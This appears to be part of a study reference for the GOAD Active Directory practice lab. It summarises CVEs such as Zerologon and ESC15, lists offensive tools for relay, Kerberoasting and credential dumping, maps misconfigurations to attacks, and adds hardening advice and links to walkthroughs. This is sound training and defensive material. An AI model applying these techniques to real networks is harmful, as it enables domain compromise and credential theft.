- Impact: Domain controller impersonation, full domain compromise
Vulnerability: ESC15 (CVE-2024-49019, "EKUwu"): certificate request agent application policy abuse on version 1 templates
- Attack: Inject the Certificate Request Agent application policy into a v1 template request, then request certificates on behalf of privileged users
- Patched: November 12, 2024
- Impact: Privilege escalation via certificate delegation
Vulnerability: Drop the MIC (CVE-2019-1040): NTLM message integrity check removal
- Attack: Stripping the MIC lets the relay clear the signing flags in the NTLM negotiation, so SMB authentication can be relayed to LDAP/LDAPS despite signing requirements
- Exploitation: Used in combination with PrinterBug/PetitPotam (ntlmrelayx `--remove-mic`)
- Impact: NTLM relay to LDAP(S) for domain compromise
Vulnerability: Zerologon (CVE-2020-1472): Netlogon's AES-CFB8 with an all-zero IV lets an unauthenticated attacker set the DC machine account password to empty
- Impact: Instant escalation to Domain Admin without credentials
- Status: Mentioned as motivation for GOAD creation
- Note: In hardened GOAD setups, all hosts are patched to the latest version, making CVE exploitation impossible
- Tools: SecuraBV/CVE-2020-1472
- BloodHound / SharpHound - AD relationship mapping
- crackmapexec (cme) - Multi-protocol enumeration
- enum4linux - SMB/RPC enumeration
- rpcclient - Direct RPC queries
- Nmap - Network scanning, service detection
- adidnsdump - DNS record enumeration
- PowerView - PowerShell AD enumeration
- Responder - LLMNR/NBT-NS poisoning
- mitm6 - DHCPv6 poisoning
- hashcat - Offline hash cracking
- john - Password cracking
- sprayhound - Password spraying
- Rubeus - Kerberos attacks (Windows)
- Impacket suite - Python-based AD attacks
- GetNPUsers.py - AS-REP roasting
- GetUserSPNs.py - Kerberoasting
- getTGT.py / getST.py - Ticket operations
- secretsdump.py - Credential dumping
- psexec.py / wmiexec.py / smbexec.py - Remote execution
- addcomputer.py - Machine account creation
- rbcd.py - RBCD configuration
- raiseChild.py - Child-to-parent escalation
- ticketer.py - Golden/Silver ticket creation
- Certipy - ADCS enumeration and exploitation
- Certify - Certificate template enumeration
- Coercer - Authentication coercion
- Pywhisker / Whisker - Shadow credentials
- PetitPotam - Coercion technique
- evil-winrm - PowerShell remoting
- lsassy - LSASS credential extraction
- mimikatz - Credential extraction
- procdump - Process dumping
- mssqlclient.py - MSSQL client (Impacket)
- PowerUpSQL - PowerShell MSSQL exploitation
- PrintSpoofer / SweetPotato / BadPotato - Token impersonation
- KrbRelayUp - Kerberos relay
- WinPEAS - Privilege escalation enumeration
- bloodyAD - ACL exploitation
- dacledit.py - DACL modification
- SharpGPOAbuse - GPO abuse
- ntlmrelayx - NTLM relay attacks
- burp suite - Web application testing
| Misconfiguration | Impact | Exploitation |
|---|---|---|
| NULL sessions enabled | Anonymous enumeration | User/group discovery, share access |
| SMB signing disabled | NTLM relay attacks | Admin access to unsigned hosts |
| Weak password policy | Password attacks | Spraying, brute force |
| Passwords in descriptions | Immediate compromise | Authenticated access |
| PreAuth disabled accounts | AS-REP roasting | Offline hash cracking |
| Service accounts with SPNs | Kerberoasting | Offline TGS cracking |
| MAQ = 10 | Computer creation | RBCD, DNS spoofing, noPac |
| LDAP signing not enforced | Kerberos/NTLM relay | RBCD, account creation |
| Unconstrained delegation | TGT theft | DC compromise via coercion |
| Constrained delegation | Service impersonation | Privilege escalation |
| GenericWrite on users/computers | Multiple attack paths | Shadow credentials, RBCD, SPNs |
| WriteDacl permissions | ACL manipulation | Privilege escalation chains |
| Writable GPOs | Code execution | SYSTEM on GPO scope computers |
| ADCS misconfigurations | Certificate abuse | ESC1-15 attacks, domain compromise |
| Trustworthy databases | SQL impersonation | Database → instance escalation |
| SeImpersonate privilege | Token abuse | SYSTEM privileges |
| Forest trusts with SID history | Cross-forest compromise | Golden tickets with foreign SIDs |
| Password reuse | Credential stuffing | Multi-domain/forest access |
| WebClient service | HTTP coercion | LDAP relay attacks |
| Print Spooler enabled | Coercion + relay/CVE | DC authentication capture, RCE |
Based on the vulnerabilities in GOAD, here are key defensive measures:
- Enforce SMB signing (required, not "if client agrees") on all systems
- Enforce LDAP signing and channel binding - Prevent relay attacks
- Implement strong password policy - Complexity requirements, longer passwords
- Set MAQ to 0 - Prevent domain users from creating computer accounts
- Remove passwords from user descriptions - Use secure password storage
- Enable PreAuth for all users - Prevent AS-REP roasting
- Minimize service accounts with SPNs - Use gMSA for service accounts
- Regularly audit ACLs - Remove excessive permissions
- Constrain delegation carefully - Only to necessary services
- Harden ADCS - Review certificate templates, enable EPA on web enrollment
- Disable Print Spooler - On systems that don't need printing
- Implement privileged access workstations (PAW) - For admin activities
- Enable Credential Guard - Protect credentials in memory
- Monitor for anomalies - Kerberoasting, DCSync, Golden Tickets
- Patch regularly - Eliminate CVE exploitation vectors
- GitHub Repository: https://github.com/Orange-Cyberdefense/GOAD
- Official Documentation: https://orange-cyberdefense.github.io/GOAD/
- Creator's Blog (Mayfly): https://mayfly277.github.io/
- Part 1 - Reconnaissance and scan: https://mayfly277.github.io/posts/GOADv2-pwning_part1/
- Part 2 - Find users: https://mayfly277.github.io/posts/GOADv2-pwning-part2/
- Part 3 - Enumeration with user: https://mayfly277.github.io/posts/GOADv2-pwning-part3/
- Part 4 - Poison and relay: https://mayfly277.github.io/posts/GOADv2-pwning-part4/
- Part 5 - Exploit with user: https://mayfly277.github.io/posts/GOADv2-pwning-part5/
- Part 6 - ADCS: https://mayfly277.github.io/posts/GOADv2-pwning-part6/
- Part 7 - MSSQL: https://mayfly277.github.io/posts/GOADv2-pwning-part7/
- Part 8 - Privilege escalation: https://mayfly277.github.io/posts/GOADv2-pwning-part8/
- Part 9 - Lateral move: https://mayfly277.github.io/posts/GOADv2-pwning-part9/
- Part 10 - Delegations: https://mayfly277.github.io/posts/GOADv2-pwning-part10/
- Part 11 - ACL: https://mayfly277.github.io/posts/GOADv2-pwning-part11/
- Part 12 - Trusts: https://mayfly277.github.io/posts/GOADv2-pwning-part12/
- Part 13 - Having fun inside a domain: https://mayfly277.github.io/posts/GOADv2-pwning-part13/
- Part 14 - ADCS (ESC 5/7/9/10/11/13/14/15): https://mayfly277.github.io/posts/ADCS-part14/
- HackMD Walkthrough: https://hackmd.io/@jjavierolmedo/goad_writeup
- CyberForge Blog: https://cyberforge.blog/writeups/GOAD/
- E-nzym3 Blog: https://enzym3.io/posts/goad_walkthrough/
- Dcodezero: https://dcodezero.github.io/goad/GOAD-p1/
- GOAD-Light: Lighter version without Essos domain for lower-spec systems
- SCCM Lab: Additional lab for SCCM attacks by Mayfly
Compiled from Mayfly277's official writeups (Parts 1-14) and community contributions.
- Part 1: Reconnaissance and scanning
- Part 2: User discovery (ASREPRoast, password spraying)
- Part 3: Authenticated enumeration (BloodHound, Kerberoasting)
- Part 4: Poisoning and relay (Responder, NTLM relay, MITM6)
- Part 5: CVE exploitation (noPac, PrintNightmare)
- Part 6: ADCS attacks (ESC1-8, Certifried, Shadow Credentials)
- Part 7: MSSQL exploitation (impersonation, linked servers)
- Part 8: Privilege escalation (SeImpersonate, KrbRelayUp, AMSI bypass, in-memory execution)
- Part 9: Lateral movement (PTH, PTT, credential extraction)
- Part 10: Delegation attacks (unconstrained, constrained, RBCD)
- Part 11: ACL abuse (ForceChangePassword, GenericWrite, GPO abuse)
- Part 12: Trust exploitation (child-to-parent, forest trusts, golden ticket + ExtraSid)
- Part 13: Post-exploitation (token impersonation, RDP hijacking, file coercion)
- Part 14: Advanced ADCS (ESC5/7/9/10/11/13/14/15)